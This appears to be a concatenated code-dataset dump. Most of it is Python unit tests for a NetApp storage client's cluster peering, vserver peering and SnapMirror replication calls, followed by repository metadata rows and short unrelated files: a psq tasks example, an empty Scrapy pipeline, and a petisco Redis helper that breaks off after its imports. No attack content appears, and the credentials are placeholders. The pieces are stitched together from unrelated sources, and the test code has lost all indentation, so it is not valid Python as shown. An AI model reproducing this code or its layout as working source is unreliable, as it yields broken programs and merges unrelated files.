def test_get_aggregate_raid_types(self):
api_response = netapp_api.NaElement(fake.AGGR_GET_RAID_TYPE_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_aggregate_raid_types(
fake.SHARE_AGGREGATE_NAMES)
aggr_get_iter_args = {
'query': {
'aggr-attributes': {
'aggregate-name': '|'.join(fake.SHARE_AGGREGATE_NAMES),
}
},
'desired-attributes': {
'aggr-attributes': {
'aggregate-name': None,
'aggr-raid-attributes': {
'raid-type': None,
}
}
}
}
expected = {
fake.SHARE_AGGREGATE_NAMES[0]:
fake.SHARE_AGGREGATE_RAID_TYPES[0],
fake.SHARE_AGGREGATE_NAMES[1]:
fake.SHARE_AGGREGATE_RAID_TYPES[1]
}
self.client.send_iter_request.assert_has_calls([
mock.call('aggr-get-iter', aggr_get_iter_args)])
self.assertDictEqual(expected, result)
def test_get_aggregate_raid_types_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_aggregate_raid_types(
fake.SHARE_AGGREGATE_NAMES)
self.assertDictEqual({}, result)
def test_get_aggregate_disk_types(self):
api_response = netapp_api.NaElement(
fake.STORAGE_DISK_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.get_aggregate_disk_types(
fake.SHARE_AGGREGATE_NAMES)
expected = {
fake.SHARE_AGGREGATE_NAMES[0]:
fake.SHARE_AGGREGATE_DISK_TYPE,
fake.SHARE_AGGREGATE_NAMES[1]:
fake.SHARE_AGGREGATE_DISK_TYPE
}
self.assertEqual(len(fake.SHARE_AGGREGATE_NAMES),
self.client.send_request.call_count)
self.assertDictEqual(expected, result)
def test_get_aggregate_disk_types_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.get_aggregate_disk_types(
fake.SHARE_AGGREGATE_NAMES)
self.assertEqual(len(fake.SHARE_AGGREGATE_NAMES),
self.client.send_request.call_count)
self.assertDictEqual({}, result)
def test_check_for_cluster_credentials(self):
api_response = netapp_api.NaElement(fake.SYSTEM_NODE_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.check_for_cluster_credentials()
self.assertTrue(result)
def test_check_for_cluster_credentials_not_cluster(self):
self.mock_object(self.client,
'send_iter_request',
mock.Mock(side_effect=self._mock_api_error(
netapp_api.EAPINOTFOUND)))
result = self.client.check_for_cluster_credentials()
self.assertFalse(result)
def test_check_for_cluster_credentials_api_error(self):
self.mock_object(self.client,
'send_iter_request',
self._mock_api_error())
self.assertRaises(netapp_api.NaApiError,
self.client.check_for_cluster_credentials)
def test_create_cluster_peer(self):
self.mock_object(self.client, 'send_request')
self.client.create_cluster_peer(['fake_address_1', 'fake_address_2'],
'fake_user', 'fake_password',
'fake_passphrase')
cluster_peer_create_args = {
'peer-addresses': [
{'remote-inet-address': 'fake_address_1'},
{'remote-inet-address': 'fake_address_2'},
],
'user-name': 'fake_user',
'password': 'fake_password',
'passphrase': 'fake_passphrase',
}
self.client.send_request.assert_has_calls([
mock.call('cluster-peer-create', cluster_peer_create_args)])
def test_get_cluster_peers(self):
api_response = netapp_api.NaElement(
fake.CLUSTER_PEER_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_cluster_peers()
cluster_peer_get_iter_args = {}
self.client.send_iter_request.assert_has_calls([
mock.call('cluster-peer-get-iter', cluster_peer_get_iter_args)])
expected = [{
'active-addresses': [
fake.CLUSTER_ADDRESS_1,
fake.CLUSTER_ADDRESS_2
],
'availability': 'available',
'cluster-name': fake.CLUSTER_NAME,
'cluster-uuid': 'fake_uuid',
'peer-addresses': [fake.CLUSTER_ADDRESS_1],
'remote-cluster-name': fake.REMOTE_CLUSTER_NAME,
'serial-number': 'fake_serial_number',
'timeout': '60',
}]
self.assertEqual(expected, result)
def test_get_cluster_peers_single(self):
api_response = netapp_api.NaElement(
fake.CLUSTER_PEER_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
self.client.get_cluster_peers(remote_cluster_name=fake.CLUSTER_NAME)
cluster_peer_get_iter_args = {
'query': {
'cluster-peer-info': {
'remote-cluster-name': fake.CLUSTER_NAME,
}
},
}
self.client.send_iter_request.assert_has_calls([
mock.call('cluster-peer-get-iter', cluster_peer_get_iter_args)])
def test_get_cluster_peers_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_cluster_peers(
remote_cluster_name=fake.CLUSTER_NAME)
self.assertEqual([], result)
self.assertTrue(self.client.send_iter_request.called)
def test_delete_cluster_peer(self):
self.mock_object(self.client, 'send_request')
self.client.delete_cluster_peer(fake.CLUSTER_NAME)
cluster_peer_delete_args = {'cluster-name': fake.CLUSTER_NAME}
self.client.send_request.assert_has_calls([
mock.call('cluster-peer-delete', cluster_peer_delete_args)])
def test_get_cluster_peer_policy(self):
self.client.features.add_feature('CLUSTER_PEER_POLICY')
api_response = netapp_api.NaElement(
fake.CLUSTER_PEER_POLICY_GET_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.get_cluster_peer_policy()
expected = {
'is-unauthenticated-access-permitted': False,
'passphrase-minimum-length': 8
}
self.assertEqual(expected, result)
self.assertTrue(self.client.send_request.called)
def test_get_cluster_peer_policy_not_supported(self):
result = self.client.get_cluster_peer_policy()
self.assertEqual({}, result)
def test_set_cluster_peer_policy_not_supported(self):
self.mock_object(self.client, 'send_request')
self.client.set_cluster_peer_policy()
self.assertFalse(self.client.send_request.called)
def test_set_cluster_peer_policy_no_arguments(self):
self.client.features.add_feature('CLUSTER_PEER_POLICY')
self.mock_object(self.client, 'send_request')
self.client.set_cluster_peer_policy()
self.assertFalse(self.client.send_request.called)
def test_set_cluster_peer_policy(self):
self.client.features.add_feature('CLUSTER_PEER_POLICY')
self.mock_object(self.client, 'send_request')
self.client.set_cluster_peer_policy(
is_unauthenticated_access_permitted=True,
passphrase_minimum_length=12)
cluster_peer_policy_modify_args = {
'is-unauthenticated-access-permitted': 'true',
'passphrase-minlength': '12',
}
self.client.send_request.assert_has_calls([
mock.call('cluster-peer-policy-modify',
cluster_peer_policy_modify_args)])
def test_create_vserver_peer(self):
self.mock_object(self.client, 'send_request')
self.client.create_vserver_peer('fake_vserver', 'fake_vserver_peer')
vserver_peer_create_args = {
'vserver': 'fake_vserver',
'peer-vserver': 'fake_vserver_peer',
'applications': [
{'vserver-peer-application': 'snapmirror'},
],
}
self.client.send_request.assert_has_calls([
mock.call('vserver-peer-create', vserver_peer_create_args)])
def test_delete_vserver_peer(self):
self.mock_object(self.client, 'send_request')
self.client.delete_vserver_peer('fake_vserver', 'fake_vserver_peer')
vserver_peer_delete_args = {
'vserver': 'fake_vserver',
'peer-vserver': 'fake_vserver_peer',
}
self.client.send_request.assert_has_calls([
mock.call('vserver-peer-delete', vserver_peer_delete_args)])
def test_accept_vserver_peer(self):
self.mock_object(self.client, 'send_request')
self.client.accept_vserver_peer('fake_vserver', 'fake_vserver_peer')
vserver_peer_accept_args = {
'vserver': 'fake_vserver',
'peer-vserver': 'fake_vserver_peer',
}
self.client.send_request.assert_has_calls([
mock.call('vserver-peer-accept', vserver_peer_accept_args)])
def test_get_vserver_peers(self):
api_response = netapp_api.NaElement(
fake.VSERVER_PEER_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_vserver_peers(
vserver_name=fake.VSERVER_NAME,
peer_vserver_name=fake.VSERVER_NAME_2)
vserver_peer_get_iter_args = {
'query': {
'vserver-peer-info': {
'vserver': fake.VSERVER_NAME,
'peer-vserver': fake.VSERVER_NAME_2,
}
},
}
self.client.send_iter_request.assert_has_calls([
mock.call('vserver-peer-get-iter', vserver_peer_get_iter_args)])
expected = [{
'vserver': 'fake_vserver',
'peer-vserver': 'fake_vserver_2',
'peer-state': 'peered',
'peer-cluster': 'fake_cluster'
}]
self.assertEqual(expected, result)
def test_get_vserver_peers_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_vserver_peers(
vserver_name=fake.VSERVER_NAME,
peer_vserver_name=fake.VSERVER_NAME_2)
self.assertEqual([], result)
self.assertTrue(self.client.send_iter_request.called)
def test_ensure_snapmirror_v2(self):
self.assertIsNone(self.client._ensure_snapmirror_v2())
def test_ensure_snapmirror_v2_not_supported(self):
self.client.features.add_feature('SNAPMIRROR_V2', supported=False)
self.assertRaises(exception.NetAppException,
self.client._ensure_snapmirror_v2)
@ddt.data({'schedule': 'fake_schedule', 'policy': 'fake_policy'},
{'schedule': None, 'policy': None})
@ddt.unpack
def test_create_snapmirror(self, schedule, policy):
self.mock_object(self.client, 'send_request')
self.client.create_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME,
schedule=schedule, policy=policy)
snapmirror_create_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
'relationship-type': 'data_protection',
}
if schedule:
snapmirror_create_args['schedule'] = schedule
if policy:
snapmirror_create_args['policy'] = policy
self.client.send_request.assert_has_calls([
mock.call('snapmirror-create', snapmirror_create_args)])
def test_create_snapmirror_already_exists(self):
mock_send_req = mock.Mock(side_effect=netapp_api.NaApiError(
code=netapp_api.ERELATION_EXISTS))
self.mock_object(self.client, 'send_request', mock_send_req)
self.client.create_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_create_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
'relationship-type': 'data_protection',
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-create', snapmirror_create_args)])
def test_create_snapmirror_error(self):
mock_send_req = mock.Mock(side_effect=netapp_api.NaApiError(
code=0))
self.mock_object(self.client, 'send_request', mock_send_req)
self.assertRaises(netapp_api.NaApiError, self.client.create_snapmirror,
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
self.assertTrue(self.client.send_request.called)
@ddt.data(
{
'source_snapshot': 'fake_snapshot',
'transfer_priority': 'fake_priority'
},
{
'source_snapshot': None,
'transfer_priority': None
}
)
@ddt.unpack
def test_initialize_snapmirror(self, source_snapshot, transfer_priority):
api_response = netapp_api.NaElement(fake.SNAPMIRROR_INITIALIZE_RESULT)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.initialize_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME,
source_snapshot=source_snapshot,
transfer_priority=transfer_priority)
snapmirror_initialize_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
if source_snapshot:
snapmirror_initialize_args['source-snapshot'] = source_snapshot
if transfer_priority:
snapmirror_initialize_args['transfer-priority'] = transfer_priority
self.client.send_request.assert_has_calls([
mock.call('snapmirror-initialize', snapmirror_initialize_args)])
expected = {
'operation-id': None,
'status': 'succeeded',
'jobid': None,
'error-code': None,
'error-message': None
}
self.assertEqual(expected, result)
@ddt.data(True, False)
def test_release_snapmirror(self, relationship_info_only):
self.mock_object(self.client, 'send_request')
self.client.release_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME,
relationship_info_only=relationship_info_only)
snapmirror_release_args = {
'query': {
'snapmirror-destination-info': {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
'relationship-info-only': ('true' if relationship_info_only
else 'false'),
}
}
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-release-iter', snapmirror_release_args)])
def test_quiesce_snapmirror(self):
self.mock_object(self.client, 'send_request')
self.client.quiesce_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_quiesce_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-quiesce', snapmirror_quiesce_args)])
@ddt.data(True, False)
def test_abort_snapmirror(self, clear_checkpoint):
self.mock_object(self.client, 'send_request')
self.client.abort_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME,
clear_checkpoint=clear_checkpoint)
snapmirror_abort_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
'clear-checkpoint': 'true' if clear_checkpoint else 'false',
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-abort', snapmirror_abort_args)])
def test_abort_snapmirror_no_transfer_in_progress(self):
mock_send_req = mock.Mock(side_effect=netapp_api.NaApiError(
code=netapp_api.ENOTRANSFER_IN_PROGRESS))
self.mock_object(self.client, 'send_request', mock_send_req)
self.client.abort_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_abort_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
'clear-checkpoint': 'false',
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-abort', snapmirror_abort_args)])
def test_abort_snapmirror_error(self):
mock_send_req = mock.Mock(side_effect=netapp_api.NaApiError(code=0))
self.mock_object(self.client, 'send_request', mock_send_req)
self.assertRaises(netapp_api.NaApiError, self.client.abort_snapmirror,
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
def test_break_snapmirror(self):
self.mock_object(self.client, 'send_request')
self.client.break_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_break_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-break', snapmirror_break_args)])
@ddt.data(
{
'schedule': 'fake_schedule',
'policy': 'fake_policy',
'tries': 5,
'max_transfer_rate': 1024,
},
{
'schedule': None,
'policy': None,
'tries': None,
'max_transfer_rate': None,
}
)
@ddt.unpack
def test_modify_snapmirror(self, schedule, policy, tries,
max_transfer_rate):
self.mock_object(self.client, 'send_request')
self.client.modify_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME,
schedule=schedule, policy=policy, tries=tries,
max_transfer_rate=max_transfer_rate)
snapmirror_modify_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
if schedule:
snapmirror_modify_args['schedule'] = schedule
if policy:
snapmirror_modify_args['policy'] = policy
if tries:
snapmirror_modify_args['tries'] = tries
if max_transfer_rate:
snapmirror_modify_args['max-transfer-rate'] = max_transfer_rate
self.client.send_request.assert_has_calls([
mock.call('snapmirror-modify', snapmirror_modify_args)])
def test_update_snapmirror(self):
self.mock_object(self.client, 'send_request')
self.client.update_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_update_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-update', snapmirror_update_args)])
def test_update_snapmirror_already_transferring(self):
mock_send_req = mock.Mock(side_effect=netapp_api.NaApiError(
code=netapp_api.ETRANSFER_IN_PROGRESS))
self.mock_object(self.client, 'send_request', mock_send_req)
self.client.update_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_update_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-update', snapmirror_update_args)])
def test_update_snapmirror_already_transferring_two(self):
mock_send_req = mock.Mock(side_effect=netapp_api.NaApiError(
code=netapp_api.EANOTHER_OP_ACTIVE))
self.mock_object(self.client, 'send_request', mock_send_req)
self.client.update_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_update_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-update', snapmirror_update_args)])
def test_update_snapmirror_error(self):
mock_send_req = mock.Mock(side_effect=netapp_api.NaApiError(code=0))
self.mock_object(self.client, 'send_request', mock_send_req)
self.assertRaises(netapp_api.NaApiError, self.client.update_snapmirror,
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
def test_delete_snapmirror(self):
self.mock_object(self.client, 'send_request')
self.client.delete_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_delete_args = {
'query': {
'snapmirror-info': {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
}
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-destroy-iter', snapmirror_delete_args)])
def test__get_snapmirrors(self):
api_response = netapp_api.NaElement(fake.SNAPMIRROR_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
desired_attributes = {
'snapmirror-info': {
'source-vserver': None,
'source-volume': None,
'destination-vserver': None,
'destination-volume': None,
'is-healthy': None,
}
}
result = self.client._get_snapmirrors(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME,
desired_attributes=desired_attributes)
snapmirror_get_iter_args = {
'query': {
'snapmirror-info': {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
},
},
'desired-attributes': {
'snapmirror-info': {
'source-vserver': None,
'source-volume': None,
'destination-vserver': None,
'destination-volume': None,
'is-healthy': None,
},
},
}
self.client.send_iter_request.assert_has_calls([
mock.call('snapmirror-get-iter', snapmirror_get_iter_args)])
self.assertEqual(1, len(result))
def test__get_snapmirrors_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client._get_snapmirrors()
self.client.send_iter_request.assert_has_calls([
mock.call('snapmirror-get-iter', {})])
self.assertEqual([], result)
def test_get_snapmirrors(self):
api_response = netapp_api.NaElement(
fake.SNAPMIRROR_GET_ITER_FILTERED_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
desired_attributes = ['source-vserver', 'source-volume',
'destination-vserver', 'destination-volume',
'is-healthy', 'mirror-state', 'schedule']
result = self.client.get_snapmirrors(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME,
desired_attributes=desired_attributes)
snapmirror_get_iter_args = {
'query': {
'snapmirror-info': {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
},
},
'desired-attributes': {
'snapmirror-info': {
'source-vserver': None,
'source-volume': None,
'destination-vserver': None,
'destination-volume': None,
'is-healthy': None,
'mirror-state': None,
'schedule': None,
},
},
}
expected = [{
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
'is-healthy': 'true',
'mirror-state': 'snapmirrored',
'schedule': 'daily',
}]
self.client.send_iter_request.assert_has_calls([
mock.call('snapmirror-get-iter', snapmirror_get_iter_args)])
self.assertEqual(expected, result)
def test_resume_snapmirror(self):
self.mock_object(self.client, 'send_request')
self.client.resume_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_resume_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-resume', snapmirror_resume_args)])
def test_resume_snapmirror_not_quiesed(self):
mock_send_req = mock.Mock(side_effect=netapp_api.NaApiError(
code=netapp_api.ERELATION_NOT_QUIESCED))
self.mock_object(self.client, 'send_request', mock_send_req)
self.client.resume_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_resume_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-resume', snapmirror_resume_args)])
def test_resume_snapmirror_error(self):
mock_send_req = mock.Mock(side_effect=netapp_api.NaApiError(code=0))
self.mock_object(self.client, 'send_request', mock_send_req)
self.assertRaises(netapp_api.NaApiError, self.client.resume_snapmirror,
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
def test_resync_snapmirror(self):
self.mock_object(self.client, 'send_request')
self.client.resync_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_resync_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-resync', snapmirror_resync_args)])
@ddt.data('source', 'destination', None)
def test_volume_has_snapmirror_relationships(self, snapmirror_rel_type):
"""Snapmirror relationships can be both ways."""
vol = fake.FAKE_MANAGE_VOLUME
snapmirror = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
'is-healthy': 'true',
'mirror-state': 'snapmirrored',
'schedule': 'daily',
}
expected_get_snapmirrors_call_count = 2
expected_get_snapmirrors_calls = [
mock.call(vol['owning-vserver-name'], vol['name'], None, None),
mock.call(None, None, vol['owning-vserver-name'], vol['name']),
]
if snapmirror_rel_type is None:
side_effect = ([], [])
elif snapmirror_rel_type == 'source':
snapmirror['source-vserver'] = vol['owning-vserver-name']
snapmirror['source-volume'] = vol['name']
side_effect = ([snapmirror], None)
expected_get_snapmirrors_call_count = 1
expected_get_snapmirrors_calls.pop()
else:
snapmirror['destination-vserver'] = vol['owning-vserver-name']
snapmirror['destination-volume'] = vol['name']
side_effect = (None, [snapmirror])
mock_get_snapmirrors_call = self.mock_object(
self.client, 'get_snapmirrors', mock.Mock(side_effect=side_effect))
mock_exc_log = self.mock_object(client_cmode.LOG, 'exception')
expected_retval = True if snapmirror_rel_type else False
retval = self.client.volume_has_snapmirror_relationships(vol)
self.assertEqual(expected_retval, retval)
self.assertEqual(expected_get_snapmirrors_call_count,
mock_get_snapmirrors_call.call_count)
mock_get_snapmirrors_call.assert_has_calls(
expected_get_snapmirrors_calls)
self.assertFalse(mock_exc_log.called)
def test_volume_has_snapmirror_relationships_api_error(self):
vol = fake.FAKE_MANAGE_VOLUME
expected_get_snapmirrors_calls = [
mock.call(vol['owning-vserver-name'], vol['name'], None, None),
]
mock_get_snapmirrors_call = self.mock_object(
self.client, 'get_snapmirrors', mock.Mock(
side_effect=self._mock_api_error(netapp_api.EINTERNALERROR)))
mock_exc_log = self.mock_object(client_cmode.LOG, 'exception')
retval = self.client.volume_has_snapmirror_relationships(vol)
self.assertFalse(retval)
self.assertEqual(1, mock_get_snapmirrors_call.call_count)
mock_get_snapmirrors_call.assert_has_calls(
expected_get_snapmirrors_calls)
self.assertTrue(mock_exc_log.called)
| [
"[email protected]"
]
| |
0addb3241276b075663bba6bfbe35a333418cb49 | 845c9539b880c49b297692ab62e40eb0e25ebeab | /examples/tasks.py | 89d493830b8b742e3c0e9eb64e5fcee1c9d009ee | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
]
| permissive | mindius/psq | 6c1e28e35b84c143b390e9e9204dff24f6ef7133 | a182a6b751c29dc93b9a13c340b1deed145e3890 | refs/heads/master | 2023-03-01T02:42:42.780322 | 2021-02-09T10:35:13 | 2021-02-09T10:35:13 | 336,299,393 | 1 | 0 | Apache-2.0 | 2021-02-05T14:45:10 | 2021-02-05T14:45:10 | null | UTF-8 | Python | false | false | 704 | py | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
def slow_task():
time.sleep(10)
def print_task(value):
print(value)
def adder(a, b):
return a + b
| [
"[email protected]"
]
| |
c7b4b3fd79a720c7e02837ac27eb2800a44b7f3b | 62587160029c7c79b5d11f16e8beae4afa1c4834 | /webpages/twittscrapper/twittscrapper/pipelines.py | c40b9ecfb6e783c3a0a00f5bcfd87a2b229e9d0b | []
| no_license | LukaszMalucha/Scrapy-Collection | b11dcf2c09f33d190e506559d978e4f3b77f9f5a | 586f23b90aa984c22ea8f84eba664db9649ed780 | refs/heads/master | 2022-12-14T15:06:00.868322 | 2021-07-27T12:09:07 | 2021-07-27T12:09:07 | 144,448,351 | 3 | 0 | null | 2022-11-22T03:16:19 | 2018-08-12T07:55:05 | Python | UTF-8 | Python | false | false | 294 | py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
class TwittscrapperPipeline(object):
def process_item(self, item, spider):
return item
| [
"[email protected]"
]
| |
855708304e8f445cffbbbc23fa6d1429ec435a31 | fc85a54686e13e598541df14c472e8aa744e6713 | /tests/modules/extra/redis/mother/redis_domain_event_bus_mother.py | a60fb245abf48a044f881e381f7c89f8d93d7a1d | [
"MIT"
]
| permissive | alice-biometrics/petisco | 63721751cd43e70825b161a5ece535c80d95b6fa | 771ebe5c69dc735b8f373c2e7303d3b4eb655044 | refs/heads/main | 2023-09-01T03:53:23.642042 | 2023-08-25T05:38:42 | 2023-08-25T05:38:42 | 217,555,512 | 42 | 2 | MIT | 2023-09-12T11:06:43 | 2019-10-25T14:48:10 | Python | UTF-8 | Python | false | false | 928 | py | from redis.client import Redis
from petisco.extra.redis import RedisDomainEventBus
